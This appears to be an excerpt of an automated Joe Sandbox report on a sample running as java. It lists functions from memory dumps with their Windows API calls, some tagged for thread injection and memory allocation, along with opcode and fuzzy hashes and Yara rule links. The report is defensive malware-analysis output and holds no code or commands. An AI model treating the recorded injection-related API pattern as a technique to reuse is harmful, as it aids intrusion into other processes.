                                                            Function 068EAB00 Relevance: 1.6, APIs: 1, Instructions: 63threadinjectionCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetThreadContext.KERNEL32(?,00000000), ref: 068EAB7E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: ContextThread
                                                            • String ID:
                                                            • API String ID: 1591575202-0
                                                            • Opcode ID: bc3bcedc1cff0405d20caa657682365a9bf0eeb761fa69bea17ac0be5de35b02
                                                            • Instruction ID: ed68c6cb080c39e22354751a0206506c8a615c6d00c521f3baeb603658ff43de
                                                            • Opcode Fuzzy Hash: bc3bcedc1cff0405d20caa657682365a9bf0eeb761fa69bea17ac0be5de35b02
                                                            • Instruction Fuzzy Hash: DB2149B1D003099FCB50DFAAC8847EEBBF5EF88264F148429D519A7240DB78A945CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0563E2D8 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0563E35F
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.594522184.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_5630000_java.jbxd
                                                            Similarity
                                                            • API ID: DuplicateHandle
                                                            • String ID:
                                                            • API String ID: 3793708945-0
                                                            • Opcode ID: 90798f539165765aa1fc274fb2f24ba8438a5f58be1b4a6377892e27572c859e
                                                            • Instruction ID: 18f4595db45cfd1c9b8e38b7860d8aab9937d687bcec367dcdc9253f7c015eae
                                                            • Opcode Fuzzy Hash: 90798f539165765aa1fc274fb2f24ba8438a5f58be1b4a6377892e27572c859e
                                                            • Instruction Fuzzy Hash: 6D21C6B5900209AFDB10CFA9D584ADEBBF9FB48324F14841AE955A3310D375A944CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06936D60 Relevance: 1.6, APIs: 1, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 06936DE5
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596365905.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_6930000_java.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: da025691fff61a88b67c5e0b812cc1779e891eb60e611a832da1fd1eaa86a1a6
                                                            • Instruction ID: 551cd661584c83f03c372152f21d793409b66ec774ad5e3db1929fc07bc87036
                                                            • Opcode Fuzzy Hash: da025691fff61a88b67c5e0b812cc1779e891eb60e611a832da1fd1eaa86a1a6
                                                            • Instruction Fuzzy Hash: C4219DB4C01754DFCB50DF98E94439ABBF4EB08314F24482AE455EB641C739A505CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06936AB0 Relevance: 1.6, APIs: 1, Instructions: 58COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 06936B3A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596365905.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_6930000_java.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: 47774f32d64712164c08e4a1e33e31382ca26b3d8e401e4b7f49f16b63a991cd
                                                            • Instruction ID: a2088625fb0b98ffa6c421d845cd32016fdd9ddf6ba59e29063d36dc03049077
                                                            • Opcode Fuzzy Hash: 47774f32d64712164c08e4a1e33e31382ca26b3d8e401e4b7f49f16b63a991cd
                                                            • Instruction Fuzzy Hash: 19219AB4D053488FDB60CFA9D90839ABBF8EB08318F24842AE445E7641C3396645CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EA3AB Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068EA41E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: b9304fb78e7a35d665137cf0fca6ecba8b477e735e3dcb3d7df41929b1a62081
                                                            • Instruction ID: b9552fad8da5a5bec48851022660c708255f8d8434556ac3f68dd954e7063f53
                                                            • Opcode Fuzzy Hash: b9304fb78e7a35d665137cf0fca6ecba8b477e735e3dcb3d7df41929b1a62081
                                                            • Instruction Fuzzy Hash: 991117B59002099FCB10DFA9D844BDFBBF9EF58324F14882AD555A7250C779A944CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06933B01 Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 06933B7B
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596365905.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_6930000_java.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: a260f7c4157fc8df3033609a51876956417f0b7d0b067ea38b0d243db7a32a82
                                                            • Instruction ID: b0facea4f939fa662c46aae8700886e5ec221a5fcc62861a33e2f4f6cd62628e
                                                            • Opcode Fuzzy Hash: a260f7c4157fc8df3033609a51876956417f0b7d0b067ea38b0d243db7a32a82
                                                            • Instruction Fuzzy Hash: 3F2106B59006599FCB10CF9AD884BEEFBF9FF48360F148429E459A7240D378A545CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0563C211 Relevance: 1.6, APIs: 1, Instructions: 56libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 0563C282
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.594522184.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_5630000_java.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: c38537e196b0412be3755a1afb97742ab7eeb8e93192d079de29d002300ade5a
                                                            • Instruction ID: c2b4647e0cf8a14811d8a86c4c831a6bfbc656656348bc9e32175109deef4b27
                                                            • Opcode Fuzzy Hash: c38537e196b0412be3755a1afb97742ab7eeb8e93192d079de29d002300ade5a
                                                            • Instruction Fuzzy Hash: 3511D3B69002099FDB10CF9AD444ADEFBF9EB58324F14842AE819B7600C375A949CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06933B08 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualProtect.KERNEL32(?,?,?,?), ref: 06933B7B
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596365905.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_6930000_java.jbxd
                                                            Similarity
                                                            • API ID: ProtectVirtual
                                                            • String ID:
                                                            • API String ID: 544645111-0
                                                            • Opcode ID: 4cd7cddf8244fe35033134cc6312c64d0d88d4ce6cc12b29b8a90d4689c3fc7e
                                                            • Instruction ID: 71dfb366c1141002bd9b465a4829879d1d7e5548a283a09463c9697e8e8aa2e8
                                                            • Opcode Fuzzy Hash: 4cd7cddf8244fe35033134cc6312c64d0d88d4ce6cc12b29b8a90d4689c3fc7e
                                                            • Instruction Fuzzy Hash: 722114B19006499FCB10CF9AC884BDEFBF8FF48360F108429E459A7240D378A544CFA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 06936AC0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 06936B3A
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596365905.0000000006930000.00000040.00000800.00020000.00000000.sdmp, Offset: 06930000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_6930000_java.jbxd
                                                            Similarity
                                                            • API ID: EncodePointer
                                                            • String ID:
                                                            • API String ID: 2118026453-0
                                                            • Opcode ID: 334dbdb20e3cc13a7dbb3d1b464a392643785ad0d2f3960da5a45d7940c5c68a
                                                            • Instruction ID: a7852c14c160d58b068684031cc0f6b2d8fc7a64efd967a5b1093b820459c49a
                                                            • Opcode Fuzzy Hash: 334dbdb20e3cc13a7dbb3d1b464a392643785ad0d2f3960da5a45d7940c5c68a
                                                            • Instruction Fuzzy Hash: 1E116AB0D003599FDF60DF99D90879EBBF9EB48358F20842AE409E7640C7396545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EA3B0 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 068EA41E
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: AllocVirtual
                                                            • String ID:
                                                            • API String ID: 4275171209-0
                                                            • Opcode ID: 1d7c80b1f74f3f7551cc6c615d1d89c7c543e9d42508c55bcdcb7a4bca6e9edf
                                                            • Instruction ID: 4e5e18c6a6c29bdf1be367c7c0679ce454f57a8720ab3fb218a6c9ab33ae8488
                                                            • Opcode Fuzzy Hash: 1d7c80b1f74f3f7551cc6c615d1d89c7c543e9d42508c55bcdcb7a4bca6e9edf
                                                            • Instruction Fuzzy Hash: 671137B59002099FCF10DFA9C8447DFBBF9EF58328F14882AD515A7250CB79A944CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EAD38 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: 1ecdc118f16980a46197e7d6c1260ea26f805904d2824ca8482b589e1523a951
                                                            • Instruction ID: 3b72de0e23e357eea9a48077885d77d4cb3bcdc87a6f19945af9a3eb83d15fbe
                                                            • Opcode Fuzzy Hash: 1ecdc118f16980a46197e7d6c1260ea26f805904d2824ca8482b589e1523a951
                                                            • Instruction Fuzzy Hash: 1A115BB59002089FCB10DFA9C8447DFFBF9AF58224F148829D529A7240C779A544CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0563C218 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,?,?), ref: 0563C282
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.594522184.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_5630000_java.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad
                                                            • String ID:
                                                            • API String ID: 1029625771-0
                                                            • Opcode ID: 6a4bc5b070750b61691363a9bc67b6a2837d41bc3aaf07dfbf8ca61394db01b0
                                                            • Instruction ID: 8b2a8072ea8aff2b48b6cf3f403a79c42fb068fa52f1d180a6433037ef4bb881
                                                            • Opcode Fuzzy Hash: 6a4bc5b070750b61691363a9bc67b6a2837d41bc3aaf07dfbf8ca61394db01b0
                                                            • Instruction Fuzzy Hash: 4811D0B69002099FDB20CF9AD444ADEFBF8AB58324F14842AE419B7600C379A945CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0563A5BC Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0563BDE3), ref: 0563C016
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.594522184.0000000005630000.00000040.00000800.00020000.00000000.sdmp, Offset: 05630000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_5630000_java.jbxd
                                                            Similarity
                                                            • API ID: HandleModule
                                                            • String ID:
                                                            • API String ID: 4139908857-0
                                                            • Opcode ID: 176678adb7baf7a43e3f839e6b5770c57e3498e4d9cc3725ae3be55d7ace2d73
                                                            • Instruction ID: b5d867e5fbd7f12875f39f0706687c5a934ac84c4f646674957090a995ee0bf1
                                                            • Opcode Fuzzy Hash: 176678adb7baf7a43e3f839e6b5770c57e3498e4d9cc3725ae3be55d7ace2d73
                                                            • Instruction Fuzzy Hash: 4311EFB58046498BDB20CF9AD444B9EFBF5EB48224F14846AD829B7700C379A545CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EAD40 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: ResumeThread
                                                            • String ID:
                                                            • API String ID: 947044025-0
                                                            • Opcode ID: f12442db7688d99fc8bdb07454e6536b4dc9f411f82e5e3099043028ae67aefe
                                                            • Instruction ID: eee49c403a3564cc035db5e169e312c5b078de898ae2202a7cd6437ba72e2df3
                                                            • Opcode Fuzzy Hash: f12442db7688d99fc8bdb07454e6536b4dc9f411f82e5e3099043028ae67aefe
                                                            • Instruction Fuzzy Hash: 91113AB5D002488FCB14DFAAC8447DFFBF9AF98224F148829C519A7240C779A944CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068E6808 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 068EB7F5
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 630d171d12d174c22b66504b0f2569dca360df134833c8228f00f681fb0015cf
                                                            • Instruction ID: 6c51479bd2eadfd60295e318cbd88f3a7641fd7a333beae7bd942a2f5a716640
                                                            • Opcode Fuzzy Hash: 630d171d12d174c22b66504b0f2569dca360df134833c8228f00f681fb0015cf
                                                            • Instruction Fuzzy Hash: 1A1122B58003499FDB60CF8AC984BDEBBF8EB49324F108419E554B3600C374A944CFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EB791 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • PostMessageW.USER32(?,00000010,00000000,?), ref: 068EB7F5
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: MessagePost
                                                            • String ID:
                                                            • API String ID: 410705778-0
                                                            • Opcode ID: 6319b15b682c62775003578f49afe25e4858751e0562ee4b8b560997525ca526
                                                            • Instruction ID: f6f99ff7048c14f2d895a20d3f0df649a7172fb0956b78e1b420a2f96b568143
                                                            • Opcode Fuzzy Hash: 6319b15b682c62775003578f49afe25e4858751e0562ee4b8b560997525ca526
                                                            • Instruction Fuzzy Hash: 451103B58002499FDB20CF9AD984BDEFBF8FB49324F10841AE555A3700C374A584CFA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Non-executed Functions

                                                            Function 068EBB88 Relevance: 10.7, APIs: 7, Instructions: 175COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlDecodePointer.NTDLL ref: 068EBBEF
                                                            • RtlDecodePointer.NTDLL ref: 068EBC34
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EBC9F
                                                            • RtlDecodePointer.NTDLL(-000000FC), ref: 068EBCE9
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EBD29
                                                            • RtlDecodePointer.NTDLL ref: 068EBD6F
                                                            • RtlDecodePointer.NTDLL ref: 068EBDB3
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: Pointer$Decode$Encode
                                                            • String ID:
                                                            • API String ID: 1638560559-0
                                                            • Opcode ID: b08d3f1c3e824a840b6f79db331b12297698631e4ae0a992d039f9040f8ff395
                                                            • Instruction ID: 4965cf38e4c2f88b7c81c730472f31a33a0292e1b8aad0adcaefaf873fa8e34f
                                                            • Opcode Fuzzy Hash: b08d3f1c3e824a840b6f79db331b12297698631e4ae0a992d039f9040f8ff395
                                                            • Instruction Fuzzy Hash: E8814574D05248EFDB50CFA8E6887CDBBF1AF1A318F28841AE945A7391C7754889CF91
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EBB73 Relevance: 10.7, APIs: 7, Instructions: 162COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlDecodePointer.NTDLL ref: 068EBBEF
                                                            • RtlDecodePointer.NTDLL ref: 068EBC34
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EBC9F
                                                            • RtlDecodePointer.NTDLL(-000000FC), ref: 068EBCE9
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EBD29
                                                            • RtlDecodePointer.NTDLL ref: 068EBD6F
                                                            • RtlDecodePointer.NTDLL ref: 068EBDB3
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: Pointer$Decode$Encode
                                                            • String ID:
                                                            • API String ID: 1638560559-0
                                                            • Opcode ID: 9f9ba2d18d7cc6340db3ae68f931cc5c5ed99503eb1ddf71b79086952026a399
                                                            • Instruction ID: 71a00c60c133ff82fbafada1d9e178c7e658d6f625ff5894f69ca854c4b71f86
                                                            • Opcode Fuzzy Hash: 9f9ba2d18d7cc6340db3ae68f931cc5c5ed99503eb1ddf71b79086952026a399
                                                            • Instruction Fuzzy Hash: C2713874D05248DFCB50CFA8E6887CCBBF1AF1A318F28845AE945AB391C7754889CF51
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 068EBF00 Relevance: 10.6, APIs: 7, Instructions: 146COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlDecodePointer.NTDLL ref: 068EBF5C
                                                            • RtlDecodePointer.NTDLL ref: 068EBF9B
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EC002
                                                            • RtlDecodePointer.NTDLL(00000000), ref: 068EC03E
                                                            • RtlEncodePointer.NTDLL(00000000), ref: 068EC078
                                                            • RtlDecodePointer.NTDLL ref: 068EC0B8
                                                            • RtlDecodePointer.NTDLL ref: 068EC0F6
                                                            Memory Dump Source
                                                            • Source File: 0000001F.00000002.596131592.00000000068E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068E0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_31_2_68e0000_java.jbxd
                                                            Similarity
                                                            • API ID: Pointer$Decode$Encode
                                                            • String ID:
                                                            • API String ID: 1638560559-0
                                                            • Opcode ID: e36ac26aedda00f44a9a452b1d82816650cf5c9e4184ff873c09306a2c818cd8
                                                            • Instruction ID: 6ff43da024c542e1630a8d8c8b3ce11db849e605406948b754472923e65bed80
                                                            • Opcode Fuzzy Hash: e36ac26aedda00f44a9a452b1d82816650cf5c9e4184ff873c09306a2c818cd8
                                                            • Instruction Fuzzy Hash: 4F6149B4C00789CFDF608FA9D44839EBBF0BB1A358F148419D566A6650C3B95188CFA6
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%